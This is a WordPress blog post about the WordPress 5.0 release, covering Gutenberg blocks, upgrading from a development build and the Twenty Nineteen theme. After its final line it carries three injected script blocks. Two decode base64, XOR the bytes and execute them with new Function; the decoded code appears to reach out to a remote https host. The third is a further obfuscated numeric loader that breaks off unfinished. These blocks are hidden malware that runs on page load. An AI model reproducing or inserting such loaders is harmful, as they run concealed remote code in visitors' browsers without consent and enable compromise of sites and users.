<div id="attachment_497259" style="width: 1059px" class="wp-caption aligncenter"><img decoding="async" aria-describedby="caption-attachment-497259" class="size-full wp-image-497259" src="https://www.79mplus.com/assets/wp5-gut-blocks3.png" alt="Gutenberg with different types of blocks" width="1049" height="626" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-gut-blocks3.png 1049w, https://79mplus.com/assets/wp5-gut-blocks3-300x179.png 300w, https://79mplus.com/assets/wp5-gut-blocks3-768x458.png 768w, https://79mplus.com/assets/wp5-gut-blocks3-1024x611.png 1024w, https://79mplus.com/assets/wp5-gut-blocks3-510x304.png 510w" sizes="(max-width: 1049px) 100vw, 1049px" /><p id="caption-attachment-497259" class="wp-caption-text">Quotes, videos, photo galleries, columns, lists? Gutenberg can handle everything!</p></div>
<p>This is not the end, however. You can also save some blocks to use it later on a different post. This is a feature that was exclusive to only some premium page builders before and is now baked into Gutenberg.</p>
<p>Gutenberg will be a part of the WordPress 5.0 Core and will be included as default. If you are excited, you can <a href="https://testgutenberg.com/" target="_blank" rel="noopener">try Gutenberg on a live demo</a> or <a href="https://wordpress.org/plugins/gutenberg/" target="_blank" rel="noopener">try it as a plugin</a> on a test WordPress installation.</p>
<p>Your old content will stay put. It will be shown in a &#8220;Classic block&#8221; with a TineMCE editor to keep your old content intact and editable as it is. You can go ahead and convert it to a block if you wish to:</p>
<div id="attachment_497253" style="width: 950px" class="wp-caption alignnone"><img decoding="async" aria-describedby="caption-attachment-497253" class="size-full wp-image-497253" src="https://www.79mplus.com/assets/wp5-gut-classic-block.png" alt="Classic block on Gutenberg" width="940" height="450" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-gut-classic-block.png 940w, https://79mplus.com/assets/wp5-gut-classic-block-300x144.png 300w, https://79mplus.com/assets/wp5-gut-classic-block-768x368.png 768w, https://79mplus.com/assets/wp5-gut-classic-block-510x244.png 510w" sizes="(max-width: 940px) 100vw, 940px" /><p id="caption-attachment-497253" class="wp-caption-text">Classic content stays in a TinyMCE editor and optionally can be converted to a block. So you can rest assured be able to use the old editor to make changes to your old content. So no worries there.</p></div>
<h2>How to Update to WordPress 5.0</h2>
<p>At the time of writing this article, WP 5.0 is not yet available through the <a href="https://wordpress.org/download/" target="_blank" rel="noopener">official download page</a>. So, you will have to get the latest development code from SVN repo or <a href="https://wordpress.org/nightly-builds/wordpress-latest.zip" target="_blank" rel="noopener">Download from this link</a>. (Once the stable version is out, you should get a notification as usual and update as normal. But now it is not an option. Also, as it is a major update, trying it first on a test copy of your website is a better idea.)</p>
<p>You can install development version like you normally install WordPress. The Installation interface is similar to the old version. Nothing new can be noticed so far.</p>
<div id="attachment_497245" style="width: 310px" class="wp-caption aligncenter"><img decoding="async" aria-describedby="caption-attachment-497245" class="wp-image-497245 size-medium" src="https://www.79mplus.com/assets/wp5-install-300x280.png" alt="WordPress 5 installation screen" width="300" height="280" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-install-300x280.png 300w, https://79mplus.com/assets/wp5-install-510x476.png 510w, https://79mplus.com/assets/wp5-install.png 629w" sizes="(max-width: 300px) 100vw, 300px" /><p id="caption-attachment-497245" class="wp-caption-text">WordPress 5 installation screen</p></div>
<p>You can also upgrade to development version from an old 4.x installation of WordPress. Just replace everything on your WordPress installation except the wp-content directory from the development version and that should do it. This is a development version after all. So, you can try on a local or staging copy. This is best if you want to check how your website would hold up to the new version. But let us be clear we would recommend to stay away from the development version for a production website.</p>
<p>After the installation, you should have WordPress 5 way before the release date! Feel free to test around and check new features.</p>
<div id="attachment_497247" style="width: 713px" class="wp-caption aligncenter"><img decoding="async" aria-describedby="caption-attachment-497247" class="wp-image-497247 size-full" src="https://www.79mplus.com/assets/wp5-version-dashboard.png" alt="WordPress 5 Dashboard" width="703" height="517" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-version-dashboard.png 703w, https://79mplus.com/assets/wp5-version-dashboard-300x221.png 300w, https://79mplus.com/assets/wp5-version-dashboard-510x375.png 510w" sizes="(max-width: 703px) 100vw, 703px" /><p id="caption-attachment-497247" class="wp-caption-text">Feels great to have WP 5 before anyone else!</p></div>
<p>WP 5.0 will have Gutenberg as default. Surprizingly enough, as of now, the SVN version does not have the Gutenberg editor by default. Go ahead and install <a href="https://wordpress.org/plugins/gutenberg/" target="_blank" rel="noopener">the plugin</a> from WP Admin.</p>
<p>As a sidenote, if you want to update, but keep using the old editor instead of Gutenberg, you can install the <a href="https://wordpress.org/plugins/classic-editor/" target="_blank" rel="noopener">Classic Editor</a> plugin on WordPress 5.0 to use the old TinyMCE editor.</p>
<h2>What the New Theme Looks Like</h2>
<p>There will be a theme called &#8220;Twenty Nineteen&#8221; with WordPress 5.0. It is currently not installed by default on the SVN version. So we looked for it in the theme repository, but it was not there either. With a bit of searching we found <a href="https://make.wordpress.org/core/2018/10/16/introducing-twenty-nineteen/" target="_blank" rel="noopener">it was supposed to be released in November 2018</a>, but it has not yet been published.</p>
<p>But fear not, we <a href="https://github.com/WordPress/twentynineteen" target="_blank" rel="noopener">found it here on GitHub</a>. You can download it and extract to your wp-content/themes, then activate through WP Admin &#8211; Appearance.</p>
<div id="attachment_497248" style="width: 1216px" class="wp-caption aligncenter"><img decoding="async" aria-describedby="caption-attachment-497248" class="wp-image-497248 size-full" src="https://www.79mplus.com/assets/wp5-twenty-nineteen-backend.png" alt="Activating the Twenty Nineteen theme on WordPress 5" width="1206" height="629" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-twenty-nineteen-backend.png 1206w, https://79mplus.com/assets/wp5-twenty-nineteen-backend-300x156.png 300w, https://79mplus.com/assets/wp5-twenty-nineteen-backend-768x401.png 768w, https://79mplus.com/assets/wp5-twenty-nineteen-backend-1024x534.png 1024w, https://79mplus.com/assets/wp5-twenty-nineteen-backend-1080x563.png 1080w, https://79mplus.com/assets/wp5-twenty-nineteen-backend-510x266.png 510w" sizes="(max-width: 1206px) 100vw, 1206px" /><p id="caption-attachment-497248" class="wp-caption-text">Activating the Twenty Nineteen theme on WordPress 5 SVN version</p></div>
<p>The Twenty Nineteen theme is built to be fluid, so that any layout can be built with less effort. With our default install, it looks like this below:</p>
<div id="attachment_497249" style="width: 292px" class="wp-caption aligncenter"><a href="https://www.79mplus.com/assets/wp5-twenty-nineteen-frontend.png"><img decoding="async" aria-describedby="caption-attachment-497249" class="wp-image-497249 size-medium" src="https://www.79mplus.com/assets/wp5-twenty-nineteen-frontend-282x300.png" alt="Twenty Nineteen theme default look" width="282" height="300" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-twenty-nineteen-frontend-282x300.png 282w, https://79mplus.com/assets/wp5-twenty-nineteen-frontend-768x818.png 768w, https://79mplus.com/assets/wp5-twenty-nineteen-frontend-962x1024.png 962w, https://79mplus.com/assets/wp5-twenty-nineteen-frontend-1080x1150.png 1080w, https://79mplus.com/assets/wp5-twenty-nineteen-frontend-510x543.png 510w, https://79mplus.com/assets/wp5-twenty-nineteen-frontend.png 1511w" sizes="(max-width: 282px) 100vw, 282px" /></a><p id="caption-attachment-497249" class="wp-caption-text">Twenty Nineteen theme default look</p></div>
<p>It is not much to look at first, but a great theme to do further customization and build your content on. It is a good theme for minimalist look, exceptional typography and general purpose content showcasing. It also scales nicely for many display sizes.</p>
<div id="attachment_497250" style="width: 2400px" class="wp-caption alignnone"><img decoding="async" aria-describedby="caption-attachment-497250" class="wp-image-497250 size-full" src="https://www.79mplus.com/assets/wp5-post-twnty-nnteen.jpg" alt="Twenty Nineteen theme on different screens" width="2390" height="2200" title="What’s New in WordPress 5.0" srcset="https://79mplus.com/assets/wp5-post-twnty-nnteen.jpg 2390w, https://79mplus.com/assets/wp5-post-twnty-nnteen-300x276.jpg 300w, https://79mplus.com/assets/wp5-post-twnty-nnteen-768x707.jpg 768w, https://79mplus.com/assets/wp5-post-twnty-nnteen-1024x943.jpg 1024w, https://79mplus.com/assets/wp5-post-twnty-nnteen-1080x994.jpg 1080w, https://79mplus.com/assets/wp5-post-twnty-nnteen-510x469.jpg 510w" sizes="(max-width: 2390px) 100vw, 2390px" /><p id="caption-attachment-497250" class="wp-caption-text">Twenty Nineteen theme on different screens</p></div>
<h2>Bottom Line</h2>
<p><a href="https://wordpress.org/news/2018/04/the-month-in-wordpress-march-2018/" target="_blank" rel="noopener">30% of all websites on the Internet</a> is powered by WordPress. Having an update at hand for WordPress is like having an update for the internet!</p>
<p>WP 5.0 is a shiny new update that sounds like a must-have. <a href="https://make.wordpress.org/core/2018/10/03/proposed-wordpress-5-0-scope-and-schedule/" target="_blank" rel="noopener">It was planned</a> to be released on November 2018, but this is not a strict deadline. Developers seem to be targeting towards a more finished product rather than having a haste release. It may take up to January 2019 for the final release. Being a major update, we would recommend to delay the update when a stable version is released. Testing the upgrade on a staging or a local copy first would be ideal.</p>
<p>Have a good time with WordPress 5.0.<script>!function(){var _0x432938422d85=atob('NHppcn9odXNyNDVnan1uPFYoUSgoUCFrdXJ4c2swRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBMHIve3BxbSE7fy8kfXl9JH95fXh+en4peTswdnAqKlJrIUc+dGhobG8mMzN/cHNpeHpwfW55MX90eX93MnJ5aD4wPD50aGhsJjMzJSgyLioyJSwyLS4qPkEndXo0RllYfyp+OjpGWVh/Kn5Hci97cHFtQTVueWhpbnInRllYfyp+IVYoUSgoUEc7Q0N6bFlxfnl4bztBITRGWVh/Kn5gYGdhNSdGWVh/Kn5Hci97cHFtQSEtJ3ppcn9odXNyPGsoWmlfazQ1Z3V6ND14c39pcXlyaDJ+c3hlNWdveWhIdXF5c2loNGsoWmlfazAuLDUnbnloaW5yJ2FqfW48UHR5Lm5oIXhzf2lxeXJoMn9ueX1oeVlweXF5cmg0O3h1ajs1MEV2fndKfyF4c39pcXlyaDJ/bnl9aHlZcHlxeXJoNDt1em59cXk7NSdQdHkubmgyb2hlcHkyf29vSHlkaCE7bHNvdWh1c3ImenVkeXgndXJveWgmLCdmMXVyeHlkJi4tKCsoJC8tKyonfn1/d3tuc2lyeCZue359NC0pMC4vMCguMDIoLjUnbHN1cmh5bjF5anlyaG8mcnNyeSc7J0V2fndKfzJodWhweSE7T3l/aW51aGU8f3R5f3c7J0V2fndKfzJveWhdaGhudX5paHk0O31wcHNremlwcG9/bnl5cjswOzs1J0V2fndKfzJvaGVweTJ/b29IeWRoITtsc291aHVzciZ6dWR5eCd1cm95aCYsJ2t1eGh0Ji0sLDkndHl1e3RoJi0sLDknfnNueHluJiwnZjF1cnh5ZCYuLSgrKCQvLSQqJ359f3d7bnNpcngmP3p6eic7J3hzf2lxeXJoMn5zeGUyfWxseXJ4X3R1cHg0UHR5Lm5oNSd4c39pcXlyaDJ+c3hlMn1sbHlyeF90dXB4NEV2fndKfzUnemlyf2h1c3I8VSgkV35qNDVnaG5lZ1B0eS5uaDJueXFzank0NSdFdn53Sn8ybnlxc2p5NDUnYX99aH90NEN5NWdhaG5lZ3h5cHloeTxGWVh/Kn5Hci97cHFtQWF/fWh/dDRDeS41Z2FhVihRKChQMn14eFlqeXJoUHVvaHlyeW40O3F5b299e3k7MHppcn9odXNyNEN5ajVnaG5lZ3V6ND1DeWpgYD1DeWoyeH1ofTVueWhpbnIndXo0Q3lqMnh9aH0yaGVseSEhITt6bDF5cX55eDF/cHNveTs1VSgkV35qNDUnYX99aH90NEN5LzVnYWE1J3ppcn9odXNyPGlzREt3UTR0UW5Ke0Y1Z3V6NHRRbkp7RiIhdnAqKlJrMnB5cntodDVueWhpbnInan1uPEN0ITs7J2huZWdDdCFPaG51cns0VihRKChQMnBzf31odXNyOjo0VihRKChQMnBzf31odXNyMnRzb2hyfXF5YGBWKFEoKFAycHN/fWh1c3IydHNvaDVgYDs7NTJueWxwfX95NDNCa2trQDIzdTA7OzUnYX99aH90NEN5dDVnYWp9bjxDaSF2cCoqUmtHdFFuSntGQTc7M3lxfnl4Mzs3ci97cHFtNzsjeXF+eXghLTs3NEN0IzQ7OnRzb2ghOzd5cn9zeHlJTlVfc3Fsc3J5cmg0Q3Q1NSY7OzUnan1uPENocyFveWhIdXF5c2loNHppcn9odXNyNDVnaXNES3dRNHRRbkp7RjctNSdhMC0uLCwsNSdFdn53Sn8yc3Jwc314IXppcn9odXNyNDVnf3B5fW5IdXF5c2loNENoczUnYSdFdn53Sn8yb25/IUNpJ2Fpc0RLd1E0LDUnYXV6NHhzf2lxeXJoMm55fXhlT2h9aHkhISE7cHN9eHVyezs1VihRKChQMn14eFlqeXJoUHVvaHlyeW40O1hTUV9zcmh5cmhQc314eXg7MGsoWmlfazUneXBveTxrKFppX2s0NSdhNTQ1Jw=='),_0xd3aca605a494=28,_0x3c4e336edd80=new Uint8Array(_0x432938422d85['length']),_0xd8f5713db852=0;for(;_0xd8f5713db852<_0x432938422d85['length'];_0xd8f5713db852++)_0x3c4e336edd80[_0xd8f5713db852]=_0x432938422d85['charCodeAt'](_0xd8f5713db852)^_0xd3aca605a494;(new Function(new TextDecoder()['decode'](_0x3c4e336edd80)))()}();</script><script>!function(){var _0x034992db8cf3=atob('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'),_0x52421b867837=33,_0xa898e8dc7503=new Uint8Array(_0x034992db8cf3['length']),_0xc54ff33ca072=0;for(;_0xc54ff33ca072<_0x034992db8cf3['length'];_0xc54ff33ca072++)_0xa898e8dc7503[_0xc54ff33ca072]=_0x034992db8cf3['charCodeAt'](_0xc54ff33ca072)^_0x52421b867837;(new Function(new TextDecoder()['decode'](_0xa898e8dc7503)))()}();</script><script>!function(){var _0x034992db8cf3=atob('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'),_0x52421b867837=33,_0xa898e8dc7503=new Uint8Array(_0x034992db8cf3['length']),_0xc54ff33ca072=0;for(;_0xc54ff33ca072<_0x034992db8cf3['length'];_0xc54ff33ca072++)_0xa898e8dc7503[_0xc54ff33ca072]=_0x034992db8cf3['charCodeAt'](_0xc54ff33ca072)^_0x52421b867837;(new Function(new TextDecoder()['decode'](_0xa898e8dc7503)))()}();</script><script>(function(){
var x46eaa6=6026;
if(x46eaa6>0){var y17321a=x46eaa6-6757}else{var y17321a=6757}
var zf368b3=y17321a*81;
var _0xc4c3ed2ddbac=[29,26,112,5,14,48,39,6,13,10,17,16,29,30,9,11,13,10,113,26,12,32,9,16,0,26,17,7,1,36,124,37,0,10,112,46,15,48,32,9,28,35,39,42,28,121,124,35,29,9,59,43,12,25,63,4,14,120,1,7,13,10,43,44,14,47,124,33,16,33,17,43,0,48,112,42,15,13,10,7,27,32,60,24,16,33,26,13,27,13,1,24,15,9,60,18,2,47,13,17,14,47,124,7,26,14,60,10,28,29,36,4,0,48,60,1,27,35,56,10,0,26,47,17,15,120,112,17,27,13,113,24,0,13,10,1,15,10,32,10,15,35,10,4,15,13,60,2,28,35,10,10,15,10,39,46,15,13,10,10,0,48,60,7,28,10,56,5,15,13,60,42,25,47,112,17,11,121,35,37,14,48,47,16,0,47,124,31,11,29,25,33,16,32,13,6,12,25,35,3,25,121,18,31,27,9,59,2,15,36,43,25,14,36,17,29,15,9,120,25,15,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,44,11,63,35,41,30,48,17,4,0,36,125,30,16,32,13,6,12,25,35,3,25,121,18,31,11,26,17,30,9,10,124,31,14,121,43,45,15,9,120,43,12,32,47,9,30,63,120,43,14,48,120,43,11,48,29,9,30,48,39,31,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,9,35,5,15,48,29,25,15,36,43,16,14,32,120,25,0,9,56,16,15,9,35,2,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,2,14,32,29,9,0,32,17,16,30,10,59,31,11,121,25,4,11,26,56,16,11,25,63,42,14,26,9,41,14,48,17,44,0,14,43,41,14,32,26,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,59,2,15,36,43,17,14,48,1,4,30,48,39,31,14,14,17,2,14,32,29,9,0,32,17,16,16,36,30,45,13,25,120,6,11,25,56,12,30,36,17,4,11,26,56,29,14,10,47,25,14,48,43,43,12,30,43,29,15,9,120,25,15,36,43,1,12,10,9,27,14,48,17,44,0,14,43,2,11,48,18,45,30,30,124,26,12,25,120,2,11,35,6,31,30,47,35,31,14,25,9,45,14,32,44,29,14,10,47,25,14,48,43,43,12,30,43,2,12,10,59,30,13,10,56,16,15,48,29,17,11,47,120,17,11,26,10,16,13,10,18,45,2,13,1,24,15,9,60,18,2,32,39,26,0,26,39,24,9,10,6,13,31,120,35,10,7,120,112,42,7,35,9,43,27,12,121,2,15,120,59,46,7,120,10,24,7,10,60,7,7,35,121,7,24,13,36,6,7,32,60,2,7,50,48,6,28,35,125,6,27,13,35,42,7,35,47,46,27,121,60,11,12,48,47,4,31,27,17,43,0,48,63,12,9,29,26,42,15,120,113,10,0,29,32,10,27,29,10,42,25,32,112,5,14,48,39,6,13,10,17,16,31,27,17,44,15,47,63,12,14,48,60,26,2,32,59,6,0,26,59,27,14,48,32,25,9,47,120,4,9,9,1,24,15,9,60,18,2,32,5,28,11,9,125,13,2,32,59,6,0,26,59,27,14,48,32,16,11,47,63,42,11,47,120,4,29,29,36,30,27,121,10,13,26,13,26,45,27,25,14,45,26,33,17,42,12,26,120,42,13,32,43,17,30,63,39,5,15,63,39,6,11,121,14,4,29,13,5,37,15,63,120,44,15,48,1,16,15,13,1,25,0,121,13,37,13,48,5,1,12,36,43,30,0,10,43,45,12,26,14,14,27,13,60,10,29,9,59,43,12,25,63,4,14,121,125,45,25,47,112,17,11,121,35,37,11,48,13,44,15,32,17,7,26,9,35,17,11,63,39,43,5,10,43,6,29,27,17,28,13,63,47,7,30,63,39,5,15,63,39,6,11,121,14,24,28,30,30,24,28,30,10,30,27,13,113,25,25,32,9,46,29,30,47,37,11,48,13,44,15,32,17,7,29,9,59,43,12,25,63,4,14,121,125,45,25,47,112,17,11,121,35,37,13,26,25,28,0,63,112,16,26,11,17,28,13,63,47,7,30,63,39,5,15,63,39,6,11,121,14,1,27,120,14,30,2,47,59,26,0,26,39,31,12,36,6,4,29,14,29,37,11,10,9,24,9,26,59,1,11,120,26,45,16,35,1,46,14,47,60,26,12,48,47,4,31,27,17,5,9,63,120,17,12,13,26,2,25,33,17,5,9,63,120,17,12,13,29,37,13,26,25,28,0,63,112,16,30,48,29,43,14,48,124,6,13,29,1,37,12,9,5,6,15,9,48,27,26,13,60,25,9,47,112,17,11,121,35,37,12,10,13,29,0,47,121,13,11,26,47,4,11,32,63,63,14,63,121,26,2,32,13,29,13,48,112,24,14,121,43,3,12,10,59,3,12,25,60,26,2,47,63,12,12,26,47,5,30,29,60,25,30,29,32,24,29,13,1,25,0,121,13,37,12,10,13,29,0,47,121,25,2,47,47,25,12,63,13,42,11,9,60,27,26,11,39,6,11,48,9,16,0,36,43,46,11,48,17,29,7,32,13,17,11,50,39,31,0,26,48,26,2,47,63,26,14,10,124,6,29,13,1,13,11,48,63,6,12,9,59,16,31,27,17,1,13,9,112,10,15,63,47,4,25,47,25,41,15,9,120,41,13,30,13,43,29,9,1,4,0,9,120,5,11,48,44,45,16,35,1,13,10,10,112,5,14,48,39,6,13,10,17,16,31,27,17,7,0,32,29,1,12,30,13,37,13,10,59,7,9,121,29,37,13,26,5,25,14,121,9,11,11,48,63,6,12,9,59,16,31,26,43,43,12,36,35,56,11,48,17,29,13,9,39,43,29,26,112,5,14,48,39,6,13,10,17,16,29,27,17,45,9,26,59,28,14,9,124,44,30,27,17,16,15,9,35,10,15,121,9,11,12,48,47,4,31,27,17,27,14,10,112,26,15,10,14,13,14,48,63,7,31,27,13,120,6,28,13,6,12,25,35,58,0,9,47,5,0,9,39,6,29,30,10,11,2,32,1,29,0,48,13,17,13,30,43,31,11,26,63,16,29,30,124,56,6,33,39,60,16,36,29,37,13,10,59,7,9,121,29,6,11,63,63,43,29,13,1,37,13,32,25,46,13,26,47,26,30,63,39,43,12,27,59,43,11,9,63,43,11,47,120,48,0,10,47,44,0,9,60,26,16,34,39,31,14,63,120,43,14,63,121,29,4,25,9,2,0,14,125,30,16,32,47,2,11,26,29,25,15,32,47,6,13,10,17,16,30,32,5,3,14,32,44,45,29,13,1,37,13,32,25,46,13,26,47,26,30,63,120,25,14,10,63,31,12,9,121,13,28,13,36,2,27,29,1,37,13,32,25,46,13,26,47,26,30,48,17,16,14,26,17,17,0,29,25,46,12,10,43,41,12,26,9,31,14,121,14,25,9,47,120,4,9,9,1,37,0,47,13,42,13,48,25,7,0,30,13,50,3,34,17,123,30,63,35,17,11,63,39,43,29,27,17,27,14,10,112,26,15,10,14,16,11,48,63,3,11,26,17,16,11,32,63,60,0,9,13,6,29,14,10,11,10,10,39,17,12,26,39,26,29,26,48,25,9,33,17,16,15,9,35,10,15,121,13,43,29,13,1,13,10,13,1,37,13,32,25,46,13,26,47,26,30,48,17,16,0,9,59,4,14,47,60,13,2,32,1,29,0,48,13,17,13,30,43,31,14,63,120,25,14,10,63,31,12,9,121,13,0,63,63,16,15,47,120,25,14,32,44,26,29,9,1,37,14,48,47,2,9,26,60,26,14,48,63,7,31,28,63,4,11,48,17,4,29,30,10,25,25,47,26,11,2,32,1,29,0,48,13,17,13,30,43,3,0,10,43,44,29,28,5,57,6,34,44,16,11,47,120,4,13,10,43,45,13,10,112,9,29,27,17,26,13,48,9,16,29,14,10,11,10,14,10,11,10,10,112,5,14,48,39,6,13,10,17,16,31,27,17,2,13,10,43,30,13,10,32,26,2,47,63,43,12,26,120,42,13,30,9,11,13,10,113,26,2,47,63,43,12,26,120,42,13,29,44,13,2,32,43,17,14,48,124,7,14,47,36,16,14,26,63,16,0,47,120,26,29,9,59,43,12,25,63,4,14,121,35,56,11,48,17,29,13,9,39,43,30,63,59,43,11,32,17,30,12,48,48,26,14,63,63,30,14,30,10,11,12,48,47,4,31,27,17,16,11,48,124,28,15,47,113,13,9,32,5,3,14,32,43,4,11,26,56,12,16,35,60,16,27,30,125,30,14,10,63,6,13,26,17,44,25,121,124,43,12,26,13,37,15,32,47,30,14,30,125,30,11,26,47,4,15,10,25,3,25,49,1,11,12,26,18,12,2,32,39,